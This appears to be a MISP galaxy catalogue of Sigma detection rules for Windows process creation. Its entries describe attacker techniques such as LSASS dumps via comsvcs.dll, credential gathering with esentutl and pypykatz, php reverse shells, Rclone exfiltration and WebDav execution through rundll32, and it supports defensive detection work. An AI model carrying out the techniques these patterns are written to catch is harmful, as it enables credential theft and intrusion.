WebDav Client Execution Via Rundll32.EXE

Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie". This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server).

Internal MISP references

UUID 2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5 which can be used as unique global reference for WebDav Client Execution Via Rundll32.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/05/02
falsepositive ['Unknown']
filename proc_creation_win_rundll32_webdav_client_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration', 'attack.t1048.003']
Related clusters

To see the related clusters, click here.

Disable Windows IIS HTTP Logging

Detects disabling of HTTP logging on a Windows IIS web server, as seen used by Threat Group 3390 (Bronze Union)

Internal MISP references

UUID e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e which can be used as unique global reference for Disable Windows IIS HTTP Logging in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/09
falsepositive ['Unknown']
filename proc_creation_win_iis_appcmd_http_logging.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

Renamed MegaSync Execution

Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.

Internal MISP references

UUID 643bdcac-8b82-49f4-9fd9-25a90b929f3b which can be used as unique global reference for Renamed MegaSync Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sittikorn S
creation_date 2021/06/22
falsepositive ['Software that illegally integrates MegaSync in a renamed form', 'Administrators that have renamed MegaSync']
filename proc_creation_win_renamed_megasync.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Potential Persistence Attempt Via Run Keys Using Reg.EXE

Detects a suspicious reg.exe command line adding a value to a Run key in the Registry

Internal MISP references

UUID de587dce-915e-4218-aac4-835ca6af6f70 which can be used as unique global reference for Potential Persistence Attempt Via Run Keys Using Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/06/28
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.', 'Legitimate administrator sets up autorun keys for legitimate reasons.', 'Discord']
filename proc_creation_win_reg_add_run_key.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

HackTool - Empire PowerShell UAC Bypass

Detects some Empire PowerShell UAC bypass methods

Internal MISP references

UUID 3268b746-88d8-4cd3-bffc-30077d02c787 which can be used as unique global reference for HackTool - Empire PowerShell UAC Bypass in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ecco
creation_date 2019/08/30
falsepositive ['Unknown']
filename proc_creation_win_hktl_empire_powershell_uac_bypass.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002', 'car.2019-04-001']
Related clusters

To see the related clusters, click here.

Potential Shim Database Persistence via Sdbinst.EXE

Detects installation of a new shim using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims

Internal MISP references

UUID 517490a7-115a-48c6-8862-1a481504d5a8 which can be used as unique global reference for Potential Shim Database Persistence via Sdbinst.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis
creation_date 2019/01/16
falsepositive ['Unknown']
filename proc_creation_win_sdbinst_shim_persistence.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1546.011']
Related clusters

To see the related clusters, click here.

Data Copied To Clipboard Via Clip.EXE

Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications.

Internal MISP references

UUID ddeff553-5233-4ae9-bbab-d64d2bd634be which can be used as unique global reference for Data Copied To Clipboard Via Clip.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/27
falsepositive ['Unknown']
filename proc_creation_win_clip_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1115']
Related clusters

To see the related clusters, click here.

Php Inline Command Execution

Detects execution of php with the "-r" flag. This could be used to launch a reverse shell or to execute PHP code inline.

Internal MISP references

UUID d81871ef-5738-47ab-9797-7a9c90cd4bfb which can be used as unique global reference for Php Inline Command Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/02
falsepositive ['Unknown']
filename proc_creation_win_php_inline_command_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Suspicious Workstation Locking via Rundll32

Detects a suspicious call to the user32.dll function that locks the user workstation

Internal MISP references

UUID 3b5b0213-0460-4e3f-8937-3abf98ff7dcc which can be used as unique global reference for Suspicious Workstation Locking via Rundll32 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/06/04
falsepositive ['Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option']
filename proc_creation_win_rundll32_user32_dll.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Arbitrary File Download Via Squirrel.EXE

Detects usage of "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron-based software installations (Slack, Teams, Discord, etc.)

Internal MISP references

UUID 1e75c1cc-c5d4-42aa-ac3d-91b0b68b3b4c which can be used as unique global reference for Arbitrary File Download Via Squirrel.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community
creation_date 2022/06/09
falsepositive ['Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.)']
filename proc_creation_win_squirrel_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218']
Related clusters

To see the related clusters, click here.

PUA - RunXCmd Execution

Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts

Internal MISP references

UUID 93199800-b52a-4dec-b762-75212c196542 which can be used as unique global reference for PUA - RunXCmd Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/24
falsepositive ['Legitimate use by administrators']
filename proc_creation_win_pua_runxcmd.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1569.002', 'attack.s0029']
Related clusters

To see the related clusters, click here.

DumpMinitool Execution

Detects the use of "DumpMinitool.exe", a tool that dumps process memory via the "MiniDumpWriteDump" API

Internal MISP references

UUID dee0a7a3-f200-4112-a99b-952196d81e42 which can be used as unique global reference for DumpMinitool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
creation_date 2022/04/06
falsepositive ['Unknown']
filename proc_creation_win_dumpminitool_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Potential Rundll32 Execution With DLL Stored In ADS

Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).

Internal MISP references

UUID 9248c7e1-2bf3-4661-a22c-600a8040b446 which can be used as unique global reference for Potential Rundll32 Execution With DLL Stored In ADS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Harjot Singh, '@cyb3rjy0t'
creation_date 2023/01/21
falsepositive ['Unknown']
filename proc_creation_win_rundll32_ads_stored_dll_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Electron Application CommandLine

Detects potentially suspicious command lines of Electron apps (Teams, Discord, Slack, etc.). This could be a sign of abuse to proxy execution through a signed binary.

Internal MISP references

UUID 378a05d8-963c-46c9-bcce-13c7657eac99 which can be used as unique global reference for Potentially Suspicious Electron Application CommandLine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/09/05
falsepositive ['Legitimate usage for debugging purposes']
filename proc_creation_win_susp_electron_execution_proxy.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

PUA - Rclone Execution

Detects execution of the Rclone utility for exfiltration, as used by various ransomware strains like REvil, Conti, FiveHands, etc.

Internal MISP references

UUID e37db05d-d1f9-49c8-b464-cee1a4b11638 which can be used as unique global reference for PUA - Rclone Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group
creation_date 2021/05/10
falsepositive ['Unknown']
filename proc_creation_win_pua_rclone_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567.002']
Related clusters

To see the related clusters, click here.

Local File Read Using Curl.EXE

Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files.

Internal MISP references

UUID aa6f6ea6-0676-40dd-b510-6e46f02d8867 which can be used as unique global reference for Local File Read Using Curl.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/07/27
falsepositive ['Unknown']
filename proc_creation_win_curl_local_file_read.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Deleted Data Overwritten Via Cipher.EXE

Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk. Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives

Internal MISP references

UUID 4b046706-5789-4673-b111-66f25fe99534 which can be used as unique global reference for Deleted Data Overwritten Via Cipher.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/26
falsepositive ['Unknown']
filename proc_creation_win_cipher_overwrite_deleted_data.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1485']
Related clusters

To see the related clusters, click here.

PUA - Nmap/Zenmap Execution

Detects usage of nmap/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation

Internal MISP references

UUID f6ecd1cf-19b8-4488-97f6-00f0924991a3 which can be used as unique global reference for PUA - Nmap/Zenmap Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/10
falsepositive ['Legitimate administrator activity']
filename proc_creation_win_pua_nmap_zenmap.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1046']
Related clusters

To see the related clusters, click here.

Unsigned AppX Installation Attempt Using Add-AppxPackage

Detects usage of the "Add-AppxPackage" cmdlet or its alias "Add-AppPackage" to install unsigned AppX packages.

Internal MISP references

UUID 37651c2a-42cd-4a69-ae0d-22a4349aa04a which can be used as unique global reference for Unsigned AppX Installation Attempt Using Add-AppxPackage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/31
falsepositive ['Installation of unsigned packages for testing purposes']
filename proc_creation_win_powershell_install_unsigned_appx_packages.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion']

Esentutl Gather Credentials

Conti recommended to its affiliates to use esentutl to access a dumped NTDS file. Trickbot also uses this utility to get MSEdge info via its module pwgrab.

Internal MISP references

UUID 7df1713a-1a5b-4a4b-a071-dc83b144a101 which can be used as unique global reference for Esentutl Gather Credentials in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author sam0x90
creation_date 2021/08/06
falsepositive ['To be determined']
filename proc_creation_win_esentutl_params.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

Suspicious Execution of Hostname

Detects use of the hostname utility to gather information.

Internal MISP references

UUID 7be5fb68-f9ef-476d-8b51-0256ebece19e which can be used as unique global reference for Suspicious Execution of Hostname in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/01
falsepositive ['Unknown']
filename proc_creation_win_hostname_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1082']
Related clusters

To see the related clusters, click here.

Process Access via TrolleyExpress Exclusion

Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory.

Internal MISP references

UUID 4c0aaedc-154c-4427-ada0-d80ef9c9deb6 which can be used as unique global reference for Process Access via TrolleyExpress Exclusion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/02/10
falsepositive ['Unknown']
filename proc_creation_win_citrix_trolleyexpress_procdump.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.011', 'attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

PUA - NSudo Execution

Detects the use of NSudo tool for command execution

Internal MISP references

UUID 771d1eb5-9587-4568-95fb-9ec44153a012 which can be used as unique global reference for PUA - NSudo Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali
creation_date 2022/01/24
falsepositive ['Legitimate use by administrators']
filename proc_creation_win_pua_nsudo.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1569.002', 'attack.s0029']
Related clusters

To see the related clusters, click here.

Suspicious GrpConv Execution

Detects the suspicious execution of a utility to convert Windows 3.x .grp files, or its use for persistence purposes by malicious software or actors.

Internal MISP references

UUID f14e169e-9978-4c69-acb3-1cff8200bc36 which can be used as unique global reference for Suspicious GrpConv Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/05/19
falsepositive ['Unknown']
filename proc_creation_win_lolbin_susp_grpconv.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1547']
Related clusters

To see the related clusters, click here.

RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses

Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking.

Internal MISP references

UUID a6fc3c46-23b8-4996-9ea2-573f4c4d88c5 which can be used as unique global reference for RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/13
falsepositive ['Unknown']
filename proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

WMI Backdoor Exchange Transport Agent

Detects a WMI backdoor in Exchange Transport Agents via WMI event filters.

Internal MISP references

UUID 797011dc-44f4-4e6f-9f10-a8ceefbe566b which can be used as unique global reference for WMI Backdoor Exchange Transport Agent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/10/11
falsepositive ['Unknown']
filename proc_creation_win_wmi_backdoor_exchange_transport_agent.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1546.003']
Related clusters

To see the related clusters, click here.

Automated Collection Command Prompt

Once established within a system or network, an adversary may use automated techniques for collecting internal data.

Internal MISP references

UUID f576a613-2392-4067-9d1a-9345fb58d8d1 which can be used as unique global reference for Automated Collection Command Prompt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/28
falsepositive ['Unknown']
filename proc_creation_win_susp_automated_collection.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1119', 'attack.credential_access', 'attack.t1552.001']
Related clusters

To see the related clusters, click here.

Renamed Remote Utilities RAT (RURAT) Execution

Detects execution of a renamed Remote Utilities (RURAT) binary via the Product PE header field.

Internal MISP references

UUID 9ef27c24-4903-4192-881a-3adde7ff92a5 which can be used as unique global reference for Renamed Remote Utilities RAT (RURAT) Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/19
falsepositive ['Unknown']
filename proc_creation_win_renamed_rurat.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.collection', 'attack.command_and_control', 'attack.discovery', 'attack.s0592']

Uncommon Child Process Spawned By Odbcconf.EXE

Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes.

Internal MISP references

UUID 8e3c7994-131e-4ba5-b6ea-804d49113a26 which can be used as unique global reference for Uncommon Child Process Spawned By Odbcconf.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Harjot Singh @cyb3rjy0t
creation_date 2023/05/22
falsepositive ['In rare occurrences where "odbcconf" crashes, it might spawn a "werfault" process', 'Other child processes will depend on the DLL being registered by actions like "regsvr". In cases where the DLLs have external calls (which should be rare), other child processes might spawn and additional filters need to be applied.']
filename proc_creation_win_odbcconf_uncommon_child_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.008']
Related clusters

To see the related clusters, click here.

Mavinject Inject DLL Into Running Process

Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag.

Internal MISP references

UUID 4f73421b-5a0b-4bbf-a892-5a7fb99bea66 which can be used as unique global reference for Mavinject Inject DLL Into Running Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth
creation_date 2021/07/12
falsepositive ['Unknown']
filename proc_creation_win_lolbin_mavinject_process_injection.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055.001', 'attack.t1218.013']
Related clusters

To see the related clusters, click here.

AspNetCompiler Execution

Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code.

Internal MISP references

UUID a01b8329-5953-4f73-ae2d-aa01e1f35f00 which can be used as unique global reference for AspNetCompiler Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/11/24
falsepositive ['Unknown']
filename proc_creation_win_aspnet_compiler_exectuion.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

Suspicious Msiexec Quiet Install From Remote Location

Detects usage of Msiexec.exe to quietly install packages hosted at a remote location.

Internal MISP references

UUID 8150732a-0c9d-4a99-82b9-9efb9b90c40c which can be used as unique global reference for Suspicious Msiexec Quiet Install From Remote Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/28
falsepositive ['Unknown']
filename proc_creation_win_msiexec_install_remote.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.007']
Related clusters

To see the related clusters, click here.

HackTool - Pypykatz Credentials Dumping Activity

Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through the Windows registry where the SAM database is stored.

Internal MISP references

UUID a29808fd-ef50-49ff-9c7a-59a9b040b404 which can be used as unique global reference for HackTool - Pypykatz Credentials Dumping Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/05
falsepositive ['Unknown']
filename proc_creation_win_hktl_pypykatz.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002']
Related clusters

To see the related clusters, click here.

HackTool - CreateMiniDump Execution

Detects the use of the CreateMiniDump hack tool, which is used to dump the LSASS process memory for credential extraction on the attacker's machine.

Internal MISP references

UUID 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d which can be used as unique global reference for HackTool - CreateMiniDump Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/12/22
falsepositive ['Unknown']
filename proc_creation_win_hktl_createminidump.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

File Download via CertOC.EXE

Detects when a user downloads a file by using CertOC.exe.

Internal MISP references

UUID 70ad0861-d1fe-491c-a45f-fa48148a300d which can be used as unique global reference for File Download via CertOC.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/05/16
falsepositive ['Unknown']
filename proc_creation_win_certoc_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Outlook EnableUnsafeClientMailRules Setting Enabled

Detects an attacker trying to enable the Outlook security setting "EnableUnsafeClientMailRules", which allows Outlook to run applications or execute macros.

Internal MISP references

UUID 55f0a3a1-846e-40eb-8273-677371b8d912 which can be used as unique global reference for Outlook EnableUnsafeClientMailRules Setting Enabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, Nasreddine Bencherchali (Nextron Systems)
creation_date 2018/12/27
falsepositive ['Unknown']
filename proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059', 'attack.t1202']
Related clusters

To see the related clusters, click here.

RDP Port Forwarding Rule Added Via Netsh.EXE

Detects the execution of netsh to configure a port forwarding rule for port 3389 (RDP).

Internal MISP references

UUID 782d6f3e-4c5d-4b8c-92a3-1d05fed72e63 which can be used as unique global reference for RDP Port Forwarding Rule Added Via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), oscd.community
creation_date 2019/01/29
falsepositive ['Legitimate administration activity']
filename proc_creation_win_netsh_port_forwarding_3389.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.defense_evasion', 'attack.command_and_control', 'attack.t1090']
Related clusters

To see the related clusters, click here.

PowerShell Get-Clipboard Cmdlet Via CLI

Detects usage of the 'Get-Clipboard' cmdlet via the CLI.

Internal MISP references

UUID b9aeac14-2ffd-4ad3-b967-1354a4e628c3 which can be used as unique global reference for PowerShell Get-Clipboard Cmdlet Via CLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/05/02
falsepositive ['Unknown']
filename proc_creation_win_powershell_get_clipboard.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1115']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Cabinet File Expansion

Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. as seen in Iranian MeteorExpress related attacks.

Internal MISP references

UUID 9f107a84-532c-41af-b005-8d12a607639f which can be used as unique global reference for Potentially Suspicious Cabinet File Expansion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj, X__Junior (Nextron Systems)
creation_date 2021/07/30
falsepositive ['System administrator Usage']
filename proc_creation_win_expand_cabinet_files.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Use Short Name Path in Command Line

Detects use of the Windows 8.3 short name, which could be used as a method to avoid command-line detection.

Internal MISP references

UUID 349d891d-fef0-4fe4-bc53-eee623a15969 which can be used as unique global reference for Use Short Name Path in Command Line in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali
creation_date 2022/08/07
falsepositive ['Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process.']
filename proc_creation_win_susp_ntfs_short_name_path_use_cli.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Loaded Module Enumeration Via Tasklist.EXE

Detects the enumeration of a specific DLL or EXE being used by a binary via "tasklist.exe". This is often used by attackers in order to find the specific process identifier (PID) of the process that is using the DLL in question, so that they can dump the process memory or perform other nefarious actions.

Internal MISP references

UUID 34275eb8-fa19-436b-b959-3d9ecd53fa1f which can be used as unique global reference for Loaded Module Enumeration Via Tasklist.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Swachchhanda Shrawan Poudel
creation_date 2024/02/12
falsepositive ['Unknown']
filename proc_creation_win_tasklist_module_enumeration.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.t1003']
Related clusters

To see the related clusters, click here.

Renamed Cloudflared.EXE Execution

Detects the execution of a renamed "cloudflared" binary.

Internal MISP references

UUID e0c69ebd-b54f-4aed-8ae3-e3467843f3f0 which can be used as unique global reference for Renamed Cloudflared.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/12/20
falsepositive ['Unknown']
filename proc_creation_win_renamed_cloudflared.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1090.001']
Related clusters

To see the related clusters, click here.

Chopper Webshell Process Pattern

Detects patterns found in process executions caused by China Chopper-like tiny (ASPX) webshells.

Internal MISP references

UUID fa3c117a-bc0d-416e-a31b-0c0e80653efb which can be used as unique global reference for Chopper Webshell Process Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), MSTI (query)
creation_date 2022/10/01
falsepositive ['Unknown']
filename proc_creation_win_webshell_chopper.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1505.003', 'attack.t1018', 'attack.t1033', 'attack.t1087']
Related clusters

To see the related clusters, click here.

Potential Binary Proxy Execution Via VSDiagnostics.EXE

Detects execution of "VSDiagnostics.exe" with the "start" command in order to launch and proxy arbitrary binaries.

Internal MISP references

UUID ac1c92b4-ac81-405a-9978-4604d78cc47e which can be used as unique global reference for Potential Binary Proxy Execution Via VSDiagnostics.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/03
falsepositive ['Legitimate usage for tracing and diagnostics purposes']
filename proc_creation_win_vsdiagnostics_execution_proxy.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Potential Signing Bypass Via Windows Developer Features

Detects when a user enables developer features such as "Developer Mode" or "Application Sideloading", which allow the user to install untrusted packages.

Internal MISP references

UUID a383dec4-deec-4e6e-913b-ed9249670848 which can be used as unique global reference for Potential Signing Bypass Via Windows Developer Features in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/11
falsepositive ['Unknown']
filename proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Process Memory Dump Via Comsvcs.DLL

Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.).

Internal MISP references

UUID 646ea171-dded-4578-8a4d-65e9822892e3 which can be used as unique global reference for Process Memory Dump Via Comsvcs.DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/02/18
falsepositive ['Unlikely']
filename proc_creation_win_rundll32_process_dump_via_comsvcs.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.credential_access', 'attack.t1036', 'attack.t1003.001', 'car.2013-05-009']
Related clusters

To see the related clusters, click here.

PUA - WebBrowserPassView Execution

Detects the execution of WebBrowserPassView.exe, a password recovery tool that reveals the passwords stored by the following web browsers: Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera.

Internal MISP references

UUID d0dae994-26c6-4d2d-83b5-b3c8b79ae513 which can be used as unique global reference for PUA - WebBrowserPassView Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/20
falsepositive ['Legitimate use']
filename proc_creation_win_pua_webbrowserpassview.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1555.003']
Related clusters

To see the related clusters, click here.

User Discovery And Export Via Get-ADUser Cmdlet

Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file.

Internal MISP references

UUID 1114e048-b69c-4f41-bc20-657245ae6e3f which can be used as unique global reference for User Discovery And Export Via Get-ADUser Cmdlet in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/09
falsepositive ["Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often"]
